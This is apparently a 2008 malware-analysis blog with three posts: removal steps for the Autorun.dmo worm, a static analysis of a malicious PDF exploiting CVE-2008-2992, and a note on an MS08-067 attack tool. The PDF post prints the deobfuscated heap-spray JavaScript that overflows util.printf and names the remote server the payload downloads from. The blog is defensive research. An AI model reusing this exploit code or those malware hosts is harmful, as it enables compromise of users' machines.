Sunday, November 30, 2008

Analysis of Worm.Win32.Autorun.dmo

Detection name: Worm.Win32.Autorun.dmo [F-Secure/Kaspersky]
Alias: Win32.Duta.A [Symantec]
Worm:Win32/Dutan.A [Microsoft]
MD5: 32ea1dd0476686fa496b7c4996d5175d
SHA1: 34137e752c8dcec9a9e1dc96f1e738418b7c1585

Yesterday my sister complaint to me that her laptop was found some malicious TEMP file that she cannot recognize. When I got the infected laptop, I scanned the HJT and found a suspicious item:

O4 - HKLM\..\Run: [Microsoft OfficeTool] svchosts.exe

This sample was first detected by Symantec and Microsoft on April 2008 and I was so disappointed AVG does not detect the sample that was detected by most of the AV vendors. I attach the Virustotal scan report:

Antivirus Version Last Update Result
AhnLab-V32008.11.28.22008.11.29Win-Trojan/Xema.variant
AntiVir7.9.0.362008.11.29TR/Crypt.CFI.Gen
Authentium5.1.0.42008.11.30-
Avast4.8.1281.02008.11.29Win32:Trojan-gen {Other}
AVG8.0.0.1992008.11.29-
BitDefender7.22008.11.30Worm.Autorun.VDO
CAT-QuickHeal10.002008.11.29Worm.AutoRun.dmo
ClamAV0.94.12008.11.30-
DrWeb4.44.0.091702008.11.29Trojan.DownLoader.46964
eSafe7.0.17.02008.11.27Win32.AutoRun.dmo
eTrust-Vet31.6.62342008.11.28Win32/Dutan.A
Ewido4.02008.11.29-
F-Prot4.4.4.562008.11.29-
F-Secure8.0.14332.02008.11.30Worm.Win32.AutoRun.dmo
Fortinet3.117.0.02008.11.30-
GData192008.11.30Worm.Autorun.VDO
IkarusT3.1.1.45.02008.11.30Worm.Win32.AutoRun
K7AntiVirus7.10.5382008.11.29Worm.Win32.AutoRun.dmo
Kaspersky7.0.0.1252008.11.30Worm.Win32.AutoRun.dmo
McAfee54492008.11.29W32/Autorun.worm.ba
McAfee+Artemis54492008.11.29W32/Autorun.worm.ba
Microsoft1.41042008.11.30Worm:Win32/Dutan.A
NOD3236512008.11.30Win32/AutoRun.MX
Norman5.80.022008.11.28W32/Smalltroj.DCHT
Panda9.0.0.42008.11.29-
PCTools4.4.2.02008.11.29-
Prevx1V22008.11.30Malicious Software
Rising21.05.60.002008.11.30Trojan.Win32.Undef.hme
SecureWeb-Gateway6.7.62008.11.29Trojan.Crypt.CFI.Gen
Sophos4.36.02008.11.30W32/AutoRun-JH
Sunbelt3.1.1832.22008.11.27Worm.Win32.AutoRun.dmo
Symantec102008.11.30W32.Dutan.A
TheHacker6.3.1.1.1692008.11.29-
TrendMicro8.700.0.10042008.11.28Mal_Otorun5
VBA323.12.8.92008.11.29suspected of Embedded.Win32.Delf.NLJ
ViRobot2008.11.29.14922008.11.29-
VirusBuster4.5.11.02008.11.29Worm.AutoRun.BRC
The sign of infection for this sample is very obvious. As most of the worms will do, they will propagate via the removable drives [from C:\ to Z:\] and also all the connected network drives. However this worm only infects the flash drives that attached to the infected machines. Apart from that one can notice that the CPU is running 100%. You can easily see there are 2 running processes which utilize all the CPU usage, CSRSSS.EXE and SVCHOSTS.EXE. We see this process from the HJT log also and needless to say this is the culprit infecting the machine. You can also see temp.temp (2 KB in size) files which will explain in the next paragraph.

Before I go to the removal, I would like to talk about the payload of this worm. We should always keep in mind the worm is not only spreading to increase its infection vector but it must have its payloads to further affect the machines, for example most of the worms will download other malwares from the remote site and the malware might be able to steal the sensitive information on the victims' side. Not suprising this worm has its paylaod by searching and modiyfing the Excel files throughtout the machine. This is probably why the CPU usage is fully utilized all the time as the worm keeps looking for the Excel files. This sample will drop temp.temp on every folder that contains the Excel files. The worm will find if the files csrsss.exe, svchosts.exe and winxpsp2.dll exist on the %%windir%\system, if they do not exist, the worm will drop the files there and execute them. Once the machine is infected, the worm will inject the code from the temp.temp to the header of the original Excel files so that it is not recognizeable by Microsoft Excel, however the data inside the file is still intact.

Removal

In fact, this worm can be easily detected and removed by the AV. For those AV that do not detect it like AVG, one can manually remove them, I provide a simple batch script to remove them:

  1. Trigger Task Manager.
  2. Terminate processes, SVCHOSTS.EXE and CSRSSS.EXE
  3. Run the following batch script:

  4. cd C:\Windows\System32
    attrib -H csrsss.exe
    attrib -H svchosts.exe
    attrib -H winxpsp2.dll
    del csrsss.exe
    del svchosts.exe
    del winxpsp2.dll
    reg /delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v "Microsoft OfficeTool" /f
  5. To remove the worm on the flash drives, NOTES: Remember to clean the infections on the system first to avoid the flash drives to be reinfected:
    cd /d [Drive letter of the removable drives]
    attrib -H data.exe
    attrib -H autorun.inf
    del data.exe
    del autorun.inf
  6. Restart the machine.

Update

As promised earlier, I will post the recovery of the Excel file if I found one. Actually I took 2 weeks to create a small program to automate the recovery process. My finding is the infected files can be partially recovered by using Microsoft Excel's built-in repair function. Manual recovery is needed to fully recover all elements of an infected file, and involves stripping off the bad string and replacing the Excel header. Please note that this works on some, but not all, infected files.

The executable and source code provided in the following link. The code is not optimized and you might see some redundant code. Anyway, this program is hope to help those who are not tech-savvy or lazy to manually recover the Excel files.

http://www.4shared.com/file/78575763/77ff9823/ExcelRepair_with_source.html

-- Edited 24/01/2009

Conclusion

I still cannot find the way to recover the Excel files and it is probably other people may know about it and hope they can share with me here or email to me laipeisun[at]gmail.com. I will greatly appreciate for any comments and information given. Of course, I will put the solution here if i can figure one out :)

References

http://www.symantec.com/security_response/writeup.jsp?docid=2008-041714-2706-99
http://www.f-secure.com/v-descs/worm_w32_autorun_dmo.shtml

Monday, November 17, 2008

Static Analysis of Malicious PDF Exploited by CVE-2008-2992

There is an exploit in the wild on Adobe Reader CoreSecurity and after a few days the advisory released, the first POC was also released by Elazar on milw0rm. It took only one week for the first malware exploit spread over the Internet which is detected by F-Secure as Exploit:W32/APSB08-19.B

This is analysis that I have done on the malicious PDF file.

Target: doc1.pdf.1
MD5: 0f6af57c8ba2b3cdd9593223ca38e2de
SHA1: 93044e9484357e0de6c4dd618ded8beb2e43f878

One of the common technique for PDF decompression is using zlib. Not suprisingly, this sample was deflated using zlib as well:



We can easily inflate this contents using Ghostscript with pdfinflt.ps file that comes with it. We can use the command below:

>gs -- "C:\Program Files\gs\toolbin\pdfinflt.ps" doc1.pdf.1 out.pdf.1
GPL Ghostscript 8.50 (2005-12-31)
Copyright (C) 2005 artofcode LLC, Benicia, CA. All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
Converting doc1.pdf.1 to out.pdf.1
Done.


You will see the similar output indicates the file has been inflated successfully. The inflated PDF contents:


The first screenshot shows the deobfuscated shellcode and the second one shows the obfuscated javascript. Obviously from the screenshot below, we know the deobfuscation can be done using "unescape" javascript method:



Using unescape function, we can easily convert the obfuscated code to readable javascript code:

var sccs = unescape(this.getField('text').value);
var bgbl = unescape("%u0A0A"+"%u0A0A");
var slspc = 20 + sccs.length;
while(bgbl.length < slspc) bgbl += bgbl;
var fblk = bgbl.substring(0,slspc);
var blk = bgbl.substring(0,bgbl.length - slspc);
while(blk.length + slspc < 0x60000)
blk = blk + blk + fblk;
var mmy = new Array();
for(i = 0; i < 1200; i++){ mmy[i] = blk + sccs }
var nm = 12; for(i=0;i<18;i++){ nm = nm + "9"; }
for(i=0;i<276;i++){ nm = nm + "8"; }
util.printf(unescape(""+"%"+"25%34%"+"35%30%30%30%66"), nm);
this.closeDoc(true);
This javascript code uses heap spray technique for exploitation. This exploit is using a slightly different method from the POC in which the author uses the loop to concatenate to a large number that will overflow the util.printf(), unlike POC it uses a prdefined large number.

Shellcode2exe is used to convert the unicode shell into bytecode:

By using some debugging technique, we can find the payload where this exploits try to download an arbitrary .HTA file from the remote server http://adxdnet.net/code/srun.php

China Hacker's Tool for MS08-067 Vulnerability

It is not surprised to know that there is a tool that targeting one of the major security leaks in Microsoft RPC Server service. This vulnerability (CVE-2008-4250) allows attackers to write a worm (commonly detected as Trojan.Gimmiv) to spread over the network without user interaction by creating specially crafted RPC request and sent to the vulnerable machine. A successful exploitation would result in complete control of victim's machine.

Interestingly, the hackers who use this tool 狼牙全自动MS08-067抓鸡器 (Wolfteeth Bot Catcher) will be hacked by the tool's author by dropping a backdoor file on the hackers' machine. It is a very good technique to own other hackers' machine though. :)

Below is the screenhshot of the tool:


More info:

http://securitylabs.websense.com/content/Blogs/3237.aspx (Detail analysis of the tool)
http://www.microsoft.com/technet/security/Bulletin/ms08-067.mspx


Update:

Ahh, I found that this tool does not contain the backdoor originally. The author, WolfTeeth, claimed that there are some versions of this tool distributed on the Internet have been "trojanized" and this tool can be downloaded from his "malware shop", http://www.ly807359.cn/.